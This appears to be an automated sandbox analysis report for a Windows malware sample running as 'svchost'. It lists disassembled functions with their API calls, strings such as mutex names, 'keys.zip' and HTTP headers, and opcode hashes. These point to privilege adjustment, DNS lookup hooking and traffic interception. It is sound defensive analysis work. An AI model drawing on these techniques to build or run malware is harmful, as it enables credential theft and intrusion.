                                                                                                                                                                                                                • Opcode ID: 12d1a168e113521dcfef7c61ccb10b8e5ea1fc18e3d77025a5d5d75808129f78
                                                                                                                                                                                                                • Instruction ID: 33c5ccd3f80c4411ab2af1f22f274613ebb151a6400bccb3516cbeb060aa573d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d1a168e113521dcfef7c61ccb10b8e5ea1fc18e3d77025a5d5d75808129f78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06C149B0A046448FDB14CF29D484B96BBE5FF88310F1985BADD5A8F356E775A800CFA0
                                                                                                                                                                                                                Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                                Function 02BD19B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 45sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7077), ref: 02BD1A2D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d7077,KBP), ref: 02BD1A47
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617d7077$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4173420962-1284881761
                                                                                                                                                                                                                • Opcode ID: 7c1532f9457d04f957666a4081261d1cacc261c0dd115bfecdc087baa5c066f4
                                                                                                                                                                                                                • Instruction ID: 17d90afdf5bf5e5a5ff614d7e8a6d35884979228bb7e529a97e0fd2ac6cf6099
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1532f9457d04f957666a4081261d1cacc261c0dd115bfecdc087baa5c066f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0101D630AC67127BF37157A84C4AF8E36989F04B95F104654FB6A761C097E095048BAA
                                                                                                                                                                                                                Function 02BBEB60 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBEB74
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEBD5
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEC91
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?,Host,?,?), ref: 02BBEDD3
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?,Host,?,?), ref: 02BBEE8E
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02BBF9DF,?,?), ref: 02BBEE9F
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02BBEED1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                                • API String ID: 438689982-3158524741
                                                                                                                                                                                                                • Opcode ID: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                                • Instruction ID: 4510274edb432ebf6a99fc4607050113ddef9785de68b889f654054b6fdf902a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2D1F532A042155FEF338E68C8847FEB7A6EF45314F9845D9E906AB261D7F0D842CB91
                                                                                                                                                                                                                Function 02BD41B9 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                • API String ID: 761212885-1876038977
                                                                                                                                                                                                                • Opcode ID: 977df05948f24d9b64c341ce70a8de0fcabcea6c7e5d77ea2ac86cd2c8b5e848
                                                                                                                                                                                                                • Instruction ID: a4fd0f858a9b8fb7590d9d2e8e4530977a2abbe9d526a93523c36a7d6bc29179
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 977df05948f24d9b64c341ce70a8de0fcabcea6c7e5d77ea2ac86cd2c8b5e848
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3951313194464A4FCB1ACB7C98657FA7BF6EF4A300F1485E4D9CAD7240EB719948C780
                                                                                                                                                                                                                Function 02BC92D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139memorynetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 02BC92D9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC930C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC9338
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC935F
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?), ref: 02BC9392
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC93AC
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC93B3
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC93C3
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02BC93CE
                                                                                                                                                                                                                • WSASetLastError.WS2_32(?), ref: 02BC9414
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                                • String ID: GET $POST
                                                                                                                                                                                                                • API String ID: 1455188016-2494278042
                                                                                                                                                                                                                • Opcode ID: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                                • Instruction ID: 22b8a80819cfffc0950c52264a6ad5fb85c2a779152fd9903f27daa9a5c84b96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C4120B1D00608EFEB60DFA8D884AEEBBF9EF48704F54456DE515E7200E774A9018FA5
                                                                                                                                                                                                                Function 02BB91B0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 120filesynchronizationmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,75573050,755730D0,75573080), ref: 02BB91F0
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB9204
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB920F
                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02BB9237
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB9254
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB9265
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BB9285
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BB929C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB92DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB9324
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB932D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2125184990-465009422
                                                                                                                                                                                                                • Opcode ID: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                                • Instruction ID: c0ef45637424ea677fc3a5773095195ce87454e17970645b28d93282a4fe0ba3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC41E071E80240ABD7209FA4EC84FBA77A9AB48750F104E45FB61972C6C6F0E820CF60
                                                                                                                                                                                                                Function 02BC03E0 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC040B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC040E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC041B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC041E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0437
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC0448
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0458
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC045B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC0468
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC046B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC047B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC047E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC048B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC048E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2935687291-0
                                                                                                                                                                                                                • Opcode ID: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                                • Instruction ID: ac2abdc16ec9d72f14a1b18ff4602d8132a5457ca651a31ad5e9b3a93c68ef5d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68319671A41220DBDB60AF75E888F5B7FBCEF44755F688859EE08D7680D770C450CAA0
                                                                                                                                                                                                                Function 02BB6350 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB6350
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02BB635A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75497390), ref: 02BB636A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02BB6383
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02BB639F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02BB63BB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02BB63D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                                • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                                • API String ID: 2466897691-3547598143
                                                                                                                                                                                                                • Opcode ID: 7fcb61c54695a72068771cae23dde0d4d06e9c7d0a5c1a1863a68b7b94cc3b3c
                                                                                                                                                                                                                • Instruction ID: 474f4c4472c9b39b0d4629f92d17aadd4e3f312169c4e0433bf6ab62c4ff920c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fcb61c54695a72068771cae23dde0d4d06e9c7d0a5c1a1863a68b7b94cc3b3c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95016D61BC171532F962367A1D0BFAF274D8F40E85B5681E0F623F2091DBE4EA014679
                                                                                                                                                                                                                Function 02BCCB80 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 45sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCCBF5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D73AC,BSS), ref: 02BCCC0F
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 617D73AC$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 3206501308-1718476822
                                                                                                                                                                                                                • Opcode ID: ed290bd647c04fea8157bef412b62b4b845fab891adaf991d0d562ccc23aca1d
                                                                                                                                                                                                                • Instruction ID: 5628affa57d5bea8c31145610786fadca07330723ef85a4cf5566143a11be4cc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed290bd647c04fea8157bef412b62b4b845fab891adaf991d0d562ccc23aca1d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76017B30AC9705BBE26167A4AC09F0B7B9C9F08F90F60074DFB5AA31C09BB0940087B6
                                                                                                                                                                                                                Function 02BBF870 Relevance: 20.1, APIs: 16, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF88F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF892
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF89B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF89E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8B1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8B4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF8BD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8C0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF8D3
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8D6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF8DF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8E2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8F5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8F8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF901
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF904
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
